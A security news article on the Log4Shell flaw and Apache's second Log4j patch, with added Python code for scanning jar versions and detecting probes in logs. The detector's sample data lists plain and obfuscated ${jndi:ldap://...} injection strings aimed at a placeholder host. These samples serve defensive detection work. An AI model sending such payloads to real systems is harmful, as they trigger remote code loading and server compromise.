The initial, “incomplete” patch left open a path to denial-of-service attacks
Users of the popular Apache Log4j Java logging library have been advised to apply a second patch for the critical “Log4Shell” vulnerability after the initial patch was found to be incomplete.
The vulnerability, which carries a maximum CVSS score of 10, continues to dominate infosec headlines amid evidence of active, hostile exploitation.
Maintainers and vendors of countless downstream applications have rushed to update their own software in the wake of the bug, which allows attackers to achieve remote code execution (RCE) on target systems.
The Apache Logging Services project released Apache Log4j 2.16.0 on Monday, December 13, after the first update, version 2.15.0, was found to be “incomplete in some non-default configurations and could allow an attacker to execute a denial-of-service (DoS) attack”, according to an Apache Software Foundation (ASF) blog post published yesterday (December 14).
Users still on Java 7 should upgrade to Log4j 2.12.2, the ASF said.
The first vulnerability (CVE-2021-44228), which affects Log4j 2 versions up to and including 2.14.1, means that an “attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled”.
Project maintainers rushed out the first patch, which restricted JNDI LDAP lookups to localhost by default, after proof-of-concept (PoC) exploits surfaced on Twitter and GitHub.
However, that patch was itself found to be incomplete, giving rise to a second vulnerability (CVE-2021-45046) which, in certain non-default configurations, could allow attackers to mount a DoS attack by crafting malicious input data containing a JNDI lookup pattern.
Previously recommended configuration-based mitigations, such as setting the log4j2.noFormatMsgLookup system property to true, do not mitigate the latest vulnerability, the ASF stressed.
Apache also notes that while the Log4j 1.x series is not affected by either CVE, users still running 1.x should nonetheless move to the 2.x line, because 1.x has reached end of life and no longer receives security patches.
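As an added example (not ASF or vendor tooling), the following script turns the version guidance above into a filesystem triage: it finds log4j jars by their embedded Maven metadata, reads the version, and classifies each one by the version boundaries the advisory gives (1.x end-of-life, 2.x up to 2.14.1 vulnerable to CVE-2021-44228, 2.15.0 affected by CVE-2021-45046, 2.12.2 and 2.16.0 fixed). The Maven property paths, the JndiLookup class path it reports on, and the throwaway fixture jars it builds for its own demo are assumptions of the example, not part of the article; a shaded or repackaged copy of log4j without Maven metadata will not be found this way and needs a manual check.

```python
"""Triage log4j jars found on disk against the version guidance above.

Added example (not ASF or vendor tooling): walks a directory for *.jar
files, reads the Maven version from the jar's embedded pom.properties and
classifies it using the version boundaries the advisory gives:
  1.x             unaffected by either CVE, but end-of-life
  2.x <= 2.14.1   CVE-2021-44228 (RCE)
  2.15.0          CVE-2021-45046 (DoS in some non-default configurations)
  2.12.2          fixed (Java 7 line)
  2.16.0 and up   fixed
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, Optional, Tuple

# Maven metadata paths as published (assumption): log4j-core 2.x and the legacy 1.x artifact.
POM_PATHS = (
    "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
    "META-INF/maven/log4j/log4j/pom.properties",
)
# The 2.x class implementing the JNDI lookup the advisory describes (reported for information).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(ver: str) -> Tuple[int, ...]:
    """'2.15.0' -> (2, 15, 0); '2.0-beta9' -> (2, 0) (pre-release qualifier dropped)."""
    return tuple(int(p) for p in re.findall(r"\d+", ver.split("-", 1)[0]))


def classify(version: str) -> Tuple[str, str]:
    """Return (status, recommendation) for a log4j version string."""
    v = parse_version(version)
    if v[:1] == (1,):
        return ("end-of-life",
                "not affected by CVE-2021-44228/45046, but 1.x no longer receives "
                "security fixes: migrate to the 2.x line")
    if v[:2] == (2, 12) and v >= (2, 12, 2):      # fixed line for Java 7
        return ("fixed", "2.12.2 is the fixed release for Java 7; no action")
    if v <= (2, 14, 1):
        return ("CVE-2021-44228",
                "RCE via JNDI lookup: upgrade to 2.16.0 (2.12.2 on Java 7)")
    if v == (2, 15, 0):
        return ("CVE-2021-45046",
                "first patch incomplete in some non-default configurations: upgrade to 2.16.0")
    return ("fixed", "2.16.0 or later; no action")


def inspect_jar(path: str) -> Optional[Tuple[str, bool]]:
    """Return (version, JndiLookup.class present) or None if the jar carries no log4j metadata."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        for pom in POM_PATHS:
            if pom not in names:
                continue
            for line in jar.read(pom).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip(), JNDI_CLASS in names
    return None


def scan_tree(root: str) -> Dict[str, Tuple[str, str, bool]]:
    """Map jar path -> (version, status, JndiLookup.class present) for every log4j jar under root."""
    found = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                info = inspect_jar(path)
            except zipfile.BadZipFile:
                continue                      # corrupt or not a zip at all: skip
            if info is not None:
                version, has_jndi = info
                found[path] = (version, classify(version)[0], has_jndi)
    return found


def make_fixture_jar(path: str, version: str, pom: str = POM_PATHS[0]) -> None:
    """Write a minimal constructed stand-in for a log4j jar (demo fixture only, not a real jar)."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(pom, f"version={version}\n")
        if pom == POM_PATHS[0]:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only; never loaded


def demo() -> Dict[str, Tuple[str, str, bool]]:
    """Build a throwaway tree of constructed jars and triage it."""
    root = tempfile.mkdtemp(prefix="log4j-triage-")
    for ver in ("2.14.1", "2.15.0", "2.16.0", "2.12.2"):
        make_fixture_jar(os.path.join(root, f"log4j-core-{ver}.jar"), ver)
    make_fixture_jar(os.path.join(root, "log4j-1.2.17.jar"), "1.2.17", POM_PATHS[1])
    return {os.path.basename(p): r for p, r in scan_tree(root).items()}


if __name__ == "__main__":
    for jar, (version, status, has_jndi) in sorted(demo().items()):
        print(f"{jar:26} {version:8} {status:16} JndiLookup.class={'yes' if has_jndi else 'no'}")
```

Point `scan_tree()` at an application's lib directory or a container image's unpacked filesystem to get the same table for real jars; the recommendation text from `classify()` follows the advisory's upgrade targets, so a hit on 2.15.0 is reported separately from the original RCE.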
Exploitation in the wild
In a detailed technical article, cybersecurity firm Trend Micro said it had “observed threat actors dropping variants of Mirai and Kinsing coin miners on vulnerable servers.”
“While some of the network traffic is straightforward, other threat actors are using obfuscation in the expression to mask their traffic,” it added.
Trend Micro also noted that “ransomware operators have also reportedly exploited Log4Shell, particularly those behind the Khonsari ransomware family,” and that “Mirai may use the affected systems as part of its botnet for activities such as distributed denial-of-service (DDoS) or spam.”
It added: “Although attacks in the wild are primarily delivered via HTTP, the vulnerability could be exploited over any protocol in which user input data is logged using Log4j.”
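To illustrate the obfuscation Trend Micro describes, here is an added example (not Trend Micro's or the ASF's code) that normalises Log4j's ${...} lookup syntax the way the library does, innermost lookup first, before searching for a ${jndi:...} lookup, so that nested, case-shifted and default-value-encoded variants are caught alongside the plain form. The log lines are constructed, attacker.example is a placeholder host, and the URL-decoding step assumes the input is an HTTP access log; the normaliser itself does not care which protocol produced the line.

```python
"""Spot Log4Shell probes in log lines, including obfuscated lookups.

Added example, not Trend Micro's or the ASF's code. It normalises Log4j's
${...} lookup syntax the way the library itself does, innermost lookup
first, then checks for a ${jndi:...} lookup in the result. Three tricks
seen in obfuscated probes are handled: nested lookups, the lower/upper
lookups, and the ':-' default-value syntax (${env:NaN:-j} and ${::-j}
both yield the literal 'j'). URL-decoding is applied first on the
assumption that the lines come from an HTTP access log.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup nested inside it
FROZEN = "\x01{"                              # stand-in for '${' on lookups left unexpanded
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _reduce(body: str) -> Optional[str]:
    """Text Log4j would substitute for ${body}, or None to leave it in place."""
    prefix, sep, value = body.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":                 # the lookup we are hunting: keep it literal
        return None
    if ":-" in body:                     # ${anything:-default}: assume the lookup fails
        return body.split(":-", 1)[1]
    if sep and prefix == "lower":
        return value.lower()
    if sep and prefix == "upper":
        return value.upper()
    return None                          # unknown lookup (date, sys, ...): leave as-is


def normalize(line: str) -> str:
    """Resolve nested/obfuscated lookups until only unexpandable ones remain."""
    text = unquote(line)                 # assumption: HTTP access logs may carry %24%7B for ${
    while True:
        m = INNERMOST.search(text)
        if not m:
            break
        replacement = _reduce(m.group(1))
        if replacement is None:
            replacement = FROZEN + m.group(1) + "}"   # freeze so the loop terminates
        text = text[: m.start()] + replacement + text[m.end():]
    return text.replace(FROZEN, "${")


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once normalised, contains a JNDI lookup."""
    return bool(JNDI.search(normalize(line)))


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalised line) for every line carrying a JNDI lookup."""
    return [(i, normalize(l)) for i, l in enumerate(lines, 1) if is_log4shell_probe(l)]


# Constructed sample access-log lines; 203.0.113.5 and attacker.example are placeholders.
SAMPLE_LINES = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${lower:jndi}:${lower:ldap}://attacker.example/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:${upper:ldap}://attacker.example/a}"',
    '203.0.113.5 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 "-"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LINES):
        print(f"line {n}: {hit}")
```

The normaliser rewrites the four obfuscated variants to the same ${jndi:ldap://...} string as the plain probe, which is why a plain-text signature on the raw line is not enough; the same function can be fed lines from any other logged input source, as Trend Micro's point about non-HTTP protocols suggests.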
Log4j has been widely distributed through a mirror system, and more recently through a content delivery network (CDN), while many organizations have shipped the library as part of their projects, products, or services.
Trend Micro has identified potentially vulnerable products, applications, and plug-ins, as well as actions taken or pending by vendors to correct and/or mitigate the vulnerability. These include packages or applications from Red Hat, VMware, and Atlassian.
The Apache Security Team has compiled a list of whether or not various Apache projects are known to be affected with links to updates if available.
No other Apache Logging Services sub-project, such as Log4net or Log4cxx, is impacted.
“Unless you’ve been hiding under a rock with your eyes closed and fingers in your ears, you’ve heard of a zero-day exploit in the Java logging library known as Apache Log4j,” said Dustin Childs, communications manager for Trend Micro’s Zero Day Initiative (ZDI).
“If you are running a server based on open source software, there is a good chance that you will be affected by this vulnerability,” he added. “Check with all the vendors in your business to see if they are affected and what fixes are available.”
Brian Fox, CTO of DevSecOps specialist Sonatype, compared the flaw to the notorious Apache Struts vulnerability that was exploited in the devastating 2017 Equifax breach.
“The combination of reach and potential impact here is unlike any previous component vulnerability that I can easily remember,” he told The Daily Swig last week.
Numerous tools have already been released to help enterprises scan their estates for affected systems.